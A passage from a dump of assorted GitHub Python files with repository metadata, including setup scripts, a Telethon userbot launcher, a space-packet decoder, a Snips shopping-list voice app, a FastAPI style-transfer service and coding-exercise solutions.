'poly2Volume',\n 'poly2Filter',\n 'poly2Dist',\n 'poly2Reverb',\n 'poly2Delay',) # tell django which fields to includeSequence\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User \n fields = ('id', 'email', 'password', 'username', 'location')\n","repo_name":"IntuitiveHarmony/breeze_back","sub_path":"breeze_api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644852834","text":"import json\nimport xml.etree.ElementTree as ET\n\nfrom cafe.engine.models.base import AutoMarshallingDictModel\nfrom cloudcafe.compute.common.constants import Constants\n\n\nclass FlavorExtraSpecs(AutoMarshallingDictModel):\n\n @classmethod\n def _xml_to_obj(cls, serialized_str):\n element = ET.fromstring(serialized_str)\n cls._remove_xml_etree_namespace(element, Constants.XML_API_NAMESPACE)\n return cls._xml_ele_to_obj(element)\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n specs = FlavorExtraSpecs()\n specs_dict = {item.tag: item.text for item in element.getchildren()}\n specs.update(specs_dict)\n return specs\n\n @classmethod\n def _json_to_obj(cls, json_body):\n metadata = FlavorExtraSpecs()\n meta_contents = json.loads(json_body)\n metadata.update(meta_contents.get('extra_specs'))\n return metadata\n\n @classmethod\n def _dict_to_obj(cls, json_dict):\n specs = FlavorExtraSpecs()\n specs.update(json_dict)\n return specs\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/compute/flavors_api/models/flavor_extra_specs.py","file_name":"flavor_extra_specs.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39176197802","text":"import glob\nimport os\nimport shutil\nfrom setuptools import setup, Extension, find_namespace_packages\n\nfrom Cython.Build import cythonize\n\n\ndef get_verified_absolute_path(path):\n \"\"\"Verify and return absolute path of argument.\n\n Args:\n path : Relative/absolute path\n\n Returns:\n Absolute path\n \"\"\"\n installed_path = os.path.abspath(path)\n if not os.path.exists(installed_path):\n raise RuntimeError(\"No valid path for requested component exists\")\n return installed_path\n\n\ndef get_installation_requirments(file_path):\n \"\"\"Parse pip requirements file.\n\n Args:\n file_path : path to pip requirements file\n\n Returns:\n list of requirement strings\n \"\"\"\n with open(file_path, 'r') as file:\n requirements_file_content = \\\n [line.strip() for line in file if line.strip() and not line.lstrip().startswith('#')]\n return requirements_file_content\n\n\ndef copy_all_files_in_directory(src, dest, file_ext=\"*.so\"):\n \"\"\"Copy files with given extension from source to destination directories.\n\n Args:\n src : source directory\n dest : destination directory\n file_ext : a regular expression string capturing relevant files\n \"\"\"\n files_to_copy = glob.glob(os.path.join(src, file_ext))\n if not files_to_copy:\n raise RuntimeError(\"No {} files under {}\".format(src, file_ext))\n os.makedirs(os.path.dirname(dest), exist_ok=True)\n try:\n for file in files_to_copy:\n shutil.copy(file, dest)\n print(\"{} was copied into {}\".format(file, dest))\n except (shutil.Error, PermissionError) as err:\n print('Could not copy {}. Error: {}'.format(file, err))\n raise err\n\n\n# Must be set before calling pip\nfor envvar in ['CGA_INSTALL_DIR', 'CGA_VERSION']:\n if envvar not in os.environ.keys():\n raise EnvironmentError(\n '{} environment variables must be set'.format(envvar))\n\ncga_install_dir = os.environ['CGA_INSTALL_DIR']\ncga_version = os.environ['CGA_VERSION']\n\n# Get current dir (pyclaragenomics folder is copied into a temp directory created by pip)\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\n\n\n# Copies shared libraries into clargenomics package\ncopy_all_files_in_directory(\n get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\")),\n os.path.join(current_dir, \"claragenomics\", \"shared_libs/\"),\n)\n\n# Classifiers for PyPI\npycga_classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Science/Research\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Natural Language :: English\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\"\n]\n\nextensions = [\n Extension(\n \"claragenomics.bindings.cuda\",\n sources=[os.path.join(\"claragenomics/**/cuda.pyx\")],\n include_dirs=[\n \"/usr/local/cuda/include\",\n ],\n library_dirs=[\"/usr/local/cuda/lib64\"],\n runtime_library_dirs=[\"/usr/local/cuda/lib64\"],\n libraries=[\"cudart\"],\n language=\"c++\",\n extra_compile_args=[\"-std=c++14\"],\n ),\n Extension(\n \"claragenomics.bindings.cudapoa\",\n sources=[os.path.join(\"claragenomics/**/cudapoa.pyx\")],\n include_dirs=[\n \"/usr/local/cuda/include\",\n get_verified_absolute_path(os.path.join(cga_install_dir, \"include\")),\n ],\n library_dirs=[\"/usr/local/cuda/lib64\", get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\"))],\n runtime_library_dirs=[\"/usr/local/cuda/lib64\", os.path.join('$ORIGIN', os.pardir, 'shared_libs')],\n libraries=[\"cudapoa\", \"cudart\", \"logging\"],\n language=\"c++\",\n extra_compile_args=[\"-std=c++14\"],\n ),\n Extension(\n \"claragenomics.bindings.cudaaligner\",\n sources=[os.path.join(\"claragenomics/**/cudaaligner.pyx\")],\n include_dirs=[\n \"/usr/local/cuda/include\",\n get_verified_absolute_path(os.path.join(cga_install_dir, \"include\")),\n ],\n library_dirs=[\"/usr/local/cuda/lib64\", get_verified_absolute_path(os.path.join(cga_install_dir, \"lib\"))],\n runtime_library_dirs=[\"/usr/local/cuda/lib64\", os.path.join('$ORIGIN', os.pardir, 'shared_libs')],\n libraries=[\"cudaaligner\", \"cudart\", \"logging\"],\n language=\"c++\",\n extra_compile_args=[\"-std=c++14\"],\n )\n]\n\nsetup(name='pyclaragenomics',\n version=cga_version,\n description='NVIDIA genomics python libraries and utiliites',\n author='NVIDIA Corporation',\n url=\"https://github.com/clara-genomics/ClaraGenomicsAnalysis\",\n include_package_data=True,\n data_files=[\n ('cga_shared_objects', glob.glob('claragenomics/shared_libs/*.so'))\n ],\n install_requires=get_installation_requirments(\n get_verified_absolute_path(os.path.join(current_dir, 'requirements.txt'))\n ),\n packages=find_namespace_packages(where=current_dir, include=['claragenomics.*']),\n python_requires='>=3.5',\n license='Apache License 2.0',\n long_description='Python libraries and utilities for manipulating genomics data',\n classifiers=pycga_classifiers,\n platforms=['any'],\n ext_modules=cythonize(extensions, compiler_directives={'embedsignature': True}),\n scripts=[os.path.join('bin', 'genome_simulator'),\n os.path.join('bin', 'assembly_evaluator')],\n )\n","repo_name":"rodriguezjf/ClaraGenomicsAnalysis","sub_path":"pyclaragenomics/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22944092196","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as fh:\n requirements = fh.read().splitlines()\n\nsetuptools.setup(\n name=\"flappy\",\n version=\"0.0.1\",\n author=\"Douglas Carvalho\",\n author_email=\"douglasc.dev@gmail.com\",\n description=\"A not very well coded flappy bird clone\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/douglas-cpp/flap.py\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n include_package_data=True,\n install_requires=requirements,\n python_requires='>=3.7',\n)\n","repo_name":"douglascdev/flap.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30995864920","text":"import glob\nimport logging\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom sample_config import Config\nfrom telethon.errors.rpcerrorlist import PhoneNumberInvalidError\n\nfrom userbot import bot\nfrom userbot.util import load_module, remove_plugin\n\nlogging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',\n level=logging.WARNING)\nlogger = logging.getLogger(__name__)\n\nINVALID_PH = '\\nERROR: The phone no. entered is incorrect' \\\n '\\n Tip: Use country code (eg +44) along with num.' \\\n '\\n Recheck your phone number'\n\ntry:\n bot.start()\nexcept PhoneNumberInvalidError:\n print(INVALID_PH)\n sys.exit(1)\n\nNO_LOAD = Config.NO_LOAD\npath = 'userbot/modules/*.py'\nfiles = glob.glob(path)\nfor name in files:\n with open(name) as f:\n path1 = Path(f.name)\n shortname = path1.stem\n load_module(shortname.replace(\".py\", \"\"))\nfor noload in NO_LOAD:\n remove_plugin(noload)\n print(f\"Removed plugin {noload}\")\n\n\nSEM_TEST = os.environ.get(\"SEMAPHORE\", None)\nif SEM_TEST:\n bot.disconnect()\nelse:\n bot.run_until_disconnected()\n","repo_name":"muhammedfurkan/TelethonUserBot","sub_path":"userbot/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"28788666117","text":"import ccsds\n\nimport sys\nimport pathlib\nimport functools\nimport pickle\nimport ctypes\n\nlibfec = ctypes.CDLL('libfec.so')\n\ndef usage():\n print(f'Usage: {sys.argv[0]} input_file format output_dir')\n print()\n print('Format can be either full or short')\n print(\"\"\"Full indicates a file format which is a concatenation of\n256 byte frames composed by the 4 byte CCSDS syncword, 220 bytes of\nuseful data (which is an AOS Space Data Link frame) and 32 Reed-Solomon\nparity check bytes (which are ignored here).\n\nShort indicates a file format which is a concatenation of 220 byte\nframes composed only by the useful data.\"\"\")\n\ndef read_frame(f, frame_type):\n frame_size = 220 if frame_type == 'short' else 256\n while True:\n b = f.read(frame_size)\n if not b:\n return\n if frame_type == 'full':\n b = b[4:] # drop ASM\n if libfec.decode_rs_8(b, 0, 0, 3) < 0:\n # frame has uncorrectable errors\n continue\n b = b[:-32] # drop RS parity check bytes\n yield ccsds.AOSFrame.parse(b)\n\ndef main():\n if len(sys.argv) != 4:\n usage()\n exit(1)\n\n frame_type = sys.argv[2]\n if frame_type not in ['full', 'short']:\n usage()\n exit(1)\n\n\n infile = pathlib.Path(sys.argv[1])\n f = open(sys.argv[1], 'rb')\n frames = read_frame(f, frame_type)\n\n outdir = pathlib.Path(sys.argv[3])\n\n packets = list(ccsds.extract_space_packets(frames, 245, 1, get_timestamps = True))\n apids = [ccsds.SpacePacketPrimaryHeader.parse(p[0]).APID for p in packets]\n by_apid = {apid : [p for a,p in zip(apids, packets) if a == apid]\n for apid in set(apids)}\n\n for a, ps in by_apid.items():\n apid_dir = outdir / f'APID_{a}'\n apid_dir.mkdir(parents = True, exist_ok = True)\n fname = apid_dir / infile.name\n with open(fname, 'wb') as f:\n pickle.dump(ps, f) \n\nif __name__ == '__main__':\n main()\n","repo_name":"daniestevez/jupyter_notebooks","sub_path":"Tianwen/space_packet_extract.py","file_name":"space_packet_extract.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"37"} +{"seq_id":"34854530035","text":"#User function Template for python3\n\nclass Solution:\n def findPath(self, mat, n):\n # code here\n lst=[]\n def func(i,j,st,mat,vis):\n n=len(mat)\n m=len(mat[0])\n if i<0 or j<0 or i>=n or j>=m:\n return \n if i==n-1 and j==m-1 and mat[i][j]==1:\n lst.append(st)\n return\n if mat[i][j]==1 and not vis[i][j]:\n vis[i][j]=1\n func(i,j+1,st+'R',mat,vis)\n func(i,j-1,st+'L',mat,vis)\n func(i+1,j,st+'D',mat,vis)\n func(i-1,j,st+'U',mat,vis)\n vis[i][j]=0\n vis=[[0 for i in range(len(mat[0]))] for j in range(len(mat))]\n func(0,0,'',mat,vis)\n return lst\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t = int(input())\n for i in range(t):\n n = list(map(int, input().strip().split()))\n arr = list(map(int, input().strip().split()))\n \n matrix = [[0 for i in range(n[0])]for j in range(n[0])]\n k=0\n for i in range(n[0]):\n for j in range(n[0]):\n matrix[i][j] = arr[k]\n k+=1\n ob = Solution()\n result = ob.findPath(matrix, n[0])\n result.sort()\n if len(result) == 0 :\n print(-1)\n else:\n for x in result:\n print(x,end = \" \")\n print()\n# } Driver Code Ends","repo_name":"Durgaprasad-kakarla/Geeks-for-Geeks","sub_path":"Medium/Rat in a Maze Problem - I/rat-in-a-maze-problem-i.py","file_name":"rat-in-a-maze-problem-i.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13363953103","text":"# -*- coding: UTF-8 -*-\n\nfrom type_define import *\nfrom utils import *\n\nTYPE = XLS\n\nDEFINE = (\n\t('是否导表', '_exp_flag', Bool, OPTIONAL(False)),\n\t('场景id', 'id', Int, REQUIRED),\n\t('入口坐标', 'born_pos', Tuple(Int,Int), REQUIRED),\n\t('场景宽度', 'width', Int, REQUIRED),\n\t('场景高度', 'height', Int, REQUIRED),\n\t('台阶文件名', 'floot_file', String, REQUIRED),\n\t('台阶对象层名', 'floot', String, REQUIRED),\n\t('背景文件名', 'bg_json', String, REQUIRED),\n\t('背景音乐名', 'bg_music', String, REQUIRED),\n\t('头像坐标', 'head_portrait_pos', Tuple(Int,Int), REQUIRED),\n\t('背景的tag值', 'root_tag', Int, REQUIRED),\n\t('0层速率', 'sr_0', Float, REQUIRED),\n\t('01层速率', 'sr_01', Float, REQUIRED),\n\t('02层速率', 'sr_02', Float, REQUIRED),\n\t('03层速率', 'sr_03', Float, REQUIRED),\n\t('04层速率', 'sr_04', Float, REQUIRED),\n\t('05层速率', 'sr_05', Float, REQUIRED),\n\t('场景动画', 'scene_anims', Array(String), OPTIONAL),\n)\n\nimport time\n\ndef export(old, new, depend, raw):\n\treturn new\n","repo_name":"winiceo/release_project","sub_path":"tools/exporter/exporter/exporters/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9074984887","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\n\nprocess.source = cms.Source(\"PoolSource\",\n # replace 'myfile.root' with the source file you want to use\n fileNames = cms.untracked.vstring(\n #'file:myfile.root'\n #'root://cmsxrootd.fnal.gov///store/mc/RunIIFall15MiniAODv1/RSGravToGG_kMpl-001_M-1000_TuneCUEP8M1_13TeV-pythia8/MINIAODSIM/PU25nsData2015v1_76X_mcRun2_asymptotic_v12-v1/20000/784A23B1-2DAE-E511-83F0-00266CF89498.root'\n 'root://cmsxrootd.fnal.gov//store/mc/RunIIFall15MiniAODv2/RSGravToGG_kMpl-001_M-1500_TuneCUEP8M1_13TeV-pythia8/MINIAODSIM/PU25nsData2015v1_76X_mcRun2_asymptotic_v12-v1/50000/34B117D8-C1B8-E511-B935-782BCB20EDD2.root'\n )\n)\n\nprocess.load('Configuration/StandardSequences/FrontierConditions_GlobalTag_cff')\nprocess.GlobalTag.globaltag = '76X_mcRun2_asymptotic_v12'\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\n#process.load(\"Geometry.CMSCommonData.cmsIdealGeometryXML_cfi\");\n#process.load(\"Geometry.CaloEventSetup.CaloGeometry_cfi\");\n#process.load(\"Geometry.CaloEventSetup.CaloTopology_cfi\");\n\nprocess.demo = cms.EDAnalyzer(\n'ExoDiPhotonAnalyzer',\nphotonsMiniAOD = cms.InputTag(\"slimmedPhotons\"),\ngenParticlesMiniAOD = cms.InputTag(\"prunedGenParticles\"),\nrho = cms.InputTag(\"fixedGridRhoFastjetAll\")\n)\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"ExoDiphotonAnalyzer.root\")\n )\n\nprocess.p = cms.Path(process.demo)\n","repo_name":"abuccilli/diphoton-analysis","sub_path":"ExoDiPhotonAnalyzer/python/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26055470004","text":"# 저울 # B_2437\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nw = list(map(int, input().split()))\nw.sort() # 오름차순 정렬\nresult = 0\n\nfor i in range(n):\n # 추의 무게가 'result+1'의 값보다 크다면 최솟값\n if w[i] > result+1:\n break\n # 그렇지 않다면 result에 추의 무게를 더함\n # 그냥 result로 했을 때에는 모든 최솟값의 경우의 수를 검사 못함\n result += w[i]\n\nprint(result+1)","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[greedy]/[greedy]저울.py","file_name":"[greedy]저울.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72778051628","text":"#!/usr/bin/env python3.7\n# -*- coding: utf-8 -*-\n\nfrom hermes_python.hermes import Hermes\nfrom snipsTools import SnipsConfigParser\nimport const\nfrom utils import (\n get_shopping_list,\n extract_nom,\n extract_media,\n extract_items,\n save_shopping_list,\n send_mail,\n get_message_tosend,\n)\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nCONFIG_INI = \"config.ini\"\n\n\nclass ShoppingList(object):\n \"\"\"\n Class used to wrap action code with mqtt connection\n \"\"\"\n\n def __init__(self):\n self.start_blocking()\n\n @staticmethod\n def terminate_feedback(hermes, intent_message, mode=\"default\"):\n \"\"\"\n feedback reply // future function\n :param hermes:\n :param intent_message:\n :param mode:\n \"\"\"\n if mode == \"default\":\n hermes.publish_end_session(intent_message.session_id, \"\")\n else:\n hermes.publish_end_session(intent_message.session_id, \"\")\n\n def intent_add_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the addItemOnShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n # action code goes here...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n itemsToAdd = extract_items(intent_message)\n texttospeak = \"\"\n\n for item in itemsToAdd:\n if item not in listDeCourses:\n listDeCourses.append(item)\n texttospeak = texttospeak + item + \", \"\n\n messagetospeak = const.ADD_OK.format(texttospeak=texttospeak)\n\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_list_APP\"\n )\n\n def intent_delete_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the deleteItemOnShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n # action code ...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n texttospeak = \"\"\n itemsToDel = extract_items(intent_message)\n for item in itemsToDel:\n if item in listDeCourses:\n listDeCourses.remove(item)\n texttospeak = texttospeak + item + \", \"\n\n messagetospeak = const.DEL_OK.format(texttospeak=texttospeak)\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_ist_APP\"\n )\n\n def intent_flush_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the flushShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n # action code ...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n lengthlist = len(listDeCourses)\n texttospeak = \"\"\n for item in listDeCourses:\n listDeCourses.remove(item)\n texttospeak = texttospeak + item + \", \"\n\n messagetospeak = const.FLUSH_OK.format(\n length=lengthlist, texttospeak=texttospeak\n )\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_ist_APP\"\n )\n\n def intent_list_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the itemsOnShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n # action code ...\n receivedMessage = \"[Received] intent: {}\".format(\n intent_message.intent.intent_name\n )\n logger.info(receivedMessage)\n confidenceMessage = \"[Received] confidence: : \" + str(\n intent_message.intent.confidence_score\n )\n logger.info(confidenceMessage)\n\n texttospeak = \"\"\n lengthlist = len(listDeCourses)\n if lengthlist == 0:\n messagetospeak = const.LIST_VIDE\n else:\n for item in listDeCourses:\n texttospeak = texttospeak + item + \", \"\n\n messagetospeak = const.LIST_OK.format(\n length=lengthlist, texttospeak=texttospeak\n )\n\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_ist_APP\"\n )\n\n def intent_print_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the printShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n if len(listDeCourses) == 0:\n messagetospeak = const.PRINT_VIDE\n else:\n save_shopping_list(listDeCourses)\n messagetospeak = const.PRINT_OK.format(imp=\"\")\n\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_ist_APP\"\n )\n\n def intent_send_callback(self, hermes, intent_message):\n \"\"\"\n callback function, to the sendShoppingList intent\n\n :param hermes:\n :param intent_message:\n \"\"\"\n\n media = extract_media(intent_message, \"mail\")\n user = extract_nom(intent_message, \"Alain\")\n\n if len(listDeCourses) == 0:\n messagetospeak = const.SENT_VIDE\n else:\n save_shopping_list(listDeCourses)\n msgToSend = get_message_tosend(listDeCourses)\n response = send_mail(\n SMTP_ADDR, SMTP_PORT, LOGIN, PASSWD, MAIL_FROM, MAIL_TO, msgToSend\n )\n if response == \"\":\n messagetospeak = const.SENT_OK.format(media=media, user=user)\n else:\n messagetospeak = const.SENT_KO.format(media=media, user=user)\n\n logger.info(messagetospeak)\n\n self.terminate_feedback(hermes, intent_message)\n # speak the execution result by tts\n hermes.publish_start_session_notification(\n intent_message.site_id, messagetospeak, \"Shopping_ist_APP\"\n )\n\n def master_intent_callback(self, hermes, intent_message):\n \"\"\"\n Master callback function, triggered everytime an intent is recognized\n :param hermes:\n :param intent_message:\n \"\"\"\n coming_intent = intent_message.intent.intent_name\n if coming_intent == \"Rdlc14:addItemOnShoppingList\":\n self.intent_add_callback(hermes, intent_message)\n if coming_intent == \"Rdlc14:deleteItemOnShoppingList\":\n self.intent_delete_callback(hermes, intent_message)\n if coming_intent == \"Rdlc14:itemsOnShoppingList\":\n self.intent_list_callback(hermes, intent_message)\n if coming_intent == \"Rdlc14:flushShoppingList\":\n self.intent_flush_callback(hermes, intent_message)\n if coming_intent == \"Rdlc14:printShoppingList\":\n self.intent_print_callback(hermes, intent_message)\n if coming_intent == \"Rdlc14:sendShoppingList\":\n self.intent_send_callback(hermes, intent_message)\n\n def start_blocking(self):\n \"\"\"\n Register callback function and start MQTT bus.\n \"\"\"\n logger.info(\"...myShoppingList...\")\n logger.info(\"Connection au MQTT broker\" + MQTT_ADDR)\n\n with Hermes(MQTT_ADDR) as h:\n h.subscribe_intents(self.master_intent_callback).start()\n\n\n# main function\n\n\nif __name__ == \"__main__\":\n try:\n config = SnipsConfigParser.read_configuration_file(CONFIG_INI)\n\n except:\n print(\"config --> vide\")\n config = None\n\n MQTT_IP_ADDR = config[\"global\"].get(\"mqtt_host\")\n MQTT_PORT = config[\"global\"].get(\"mqtt_port\")\n MQTT_ADDR = \"{}:{}\".format(MQTT_IP_ADDR, str(MQTT_PORT))\n\n MEDIA = config[\"media\"].get(\"default_media\")\n USERNAME = config[\"mail\"].get(\"default_user\")\n MAIL_TO = config[\"mail\"].get(\"mail_default_user\")\n SMTP_ADDR = config[\"mail\"].get(\"smtp_server\")\n SMTP_PORT = config[\"mail\"].get(\"smtp_port\")\n LOGIN = config[\"mail\"].get(\"smtp_login\")\n PASSWD = config[\"mail\"].get(\"smtp_passwd\")\n MAIL_FROM = config[\"mail\"].get(\"mail_from\")\n\n PRINTER = config[\"printer\"].get(\"default_printer\")\n\n locale = config[\"global\"].get(\"locale\")\n\n # logging config\n logging.basicConfig(\n format=\"%(asctime)s - [%(levelname)s] - %(message)s\",\n level=logging.INFO,\n filename=\"myShoppingList.log\",\n filemode=\"w\",\n )\n\n logger = logging.getLogger(\"myShoppingList\")\n handler = logging.StreamHandler()\n file_handler = RotatingFileHandler(\n \"/var/log/supervisor/assistants/shoppinglist/myshoppinglist.log\",\n maxBytes=10000,\n backupCount=3,\n )\n logger.addHandler(file_handler)\n logger.addHandler(handler)\n logger.setLevel(logging.INFO)\n\n # get the shopping list\n listDeCourses = get_shopping_list()\n\n resultToSpeak = \"\"\n\n try:\n ShoppingList()\n\n except KeyboardInterrupt:\n logger.info(\"...myQShoppingList --> stop ...\")\n","repo_name":"jeedom-rdlc14/snips-app-myShoppingList","sub_path":"app_shoppingList.py","file_name":"app_shoppingList.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9463278249","text":"import base64\nfrom io import BytesIO\n\nfrom fastapi import FastAPI, Request, UploadFile, File\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom PIL import Image\n\nfrom style_transfer_nn import get_config, prepare_config_to_predict, train\n\napp = FastAPI()\n\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def root(request: Request):\n return templates.TemplateResponse(\"index.html\", {\"request\": request})\n\n\n@app.post(\"/\")\nasync def root(request: Request, content_image: UploadFile = File(...)):\n print(content_image.filename)\n return {\"ok\": \"ok\"}\n\n\n@app.post(\"/upload\")\nasync def upload_img(\n request: Request,\n content_image: UploadFile = File(...),\n style_image: UploadFile = File(...)\n):\n content_image_bites = await content_image.read()\n style_image_bites = await style_image.read()\n config = get_config()\n config = prepare_config_to_predict(\n config,\n Image.open(BytesIO(content_image_bites)).convert('RGB'),\n Image.open(BytesIO(style_image_bites)).convert('RGB')\n )\n train(config)\n buffered = BytesIO()\n config[\"result_images\"][-1].save(buffered, format=\"JPEG\")\n return templates.TemplateResponse(\n \"result.html\", {\n \"request\": request,\n \"image\": base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\n }\n )","repo_name":"pansershrek/StyleTransfer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22181412709","text":"import sys\r\nimport clipboard\r\nimport json\r\n\r\n# Saved data variable\r\nSAVED_DATA = \"clipboard.json\"\r\n\r\n\r\n# Write json file function\r\ndef save_data(filepath, data):\r\n with open(filepath, \"w\") as f:\r\n json.dump(data, f)\r\n\r\n# Read json file function\r\ndef load_data(filepath):\r\n try:\r\n with open(filepath, \"r\") as f:\r\n data = json.load(f)\r\n return data\r\n except:\r\n return {}\r\n\r\n# Setting 2 command line arguments \r\nif len(sys.argv) == 2:\r\n command = sys.argv[1]\r\n data = load_data(SAVED_DATA)\r\n\r\n# Save command adding new key's to dict\r\n if command == \"save\":\r\n key = input(\"Enter a key: \")\r\n data[key] = clipboard.paste()\r\n save_data(SAVED_DATA, data)\r\n print(\"Data saved!\")\r\n\r\n# Load command checks for valid key and saves value to user's clipboard\r\n elif command == \"load\":\r\n key = input(\"Enter a key: \")\r\n if key in data:\r\n clipboard.copy(data[key])\r\n print(\"Data copied to clipboard\")\r\n else:\r\n print(\"Key does not exist.\")\r\n# Delete command delete's key's and values from json file\r\n elif command == \"del\":\r\n key = input(\"Enter a key to remove: \")\r\n if key in data:\r\n del data[key]\r\n save_data(SAVED_DATA, data)\r\n print(\"Key removed from saved data\")\r\n else:\r\n print(\"Unknown key!\")\r\n # List command print's out saved key's and values\r\n elif command == \"list\":\r\n print(data)\r\n else:\r\n print(\"Unknown command\")\r\nelse:\r\n print(\"Please pass exactly one command.\")\r\n","repo_name":"Calebcampbell5/Clipboard","sub_path":"multiclipboard.py","file_name":"multiclipboard.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20631302891","text":"# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n \n # @param root : root node of tree\n # @param k : integer\n # @return an integer\n def kthsmallest(self, root, k):\n stack = []\n small_index = 0\n current = root\n done = 0\n while not done:\n if current:\n stack.append(current)\n current = current.left\n elif stack:\n current = stack.pop()\n small_index += 1\n if small_index == k:\n return current.val\n current = current.right\n else:\n done = 1\n return -1\n \n \n 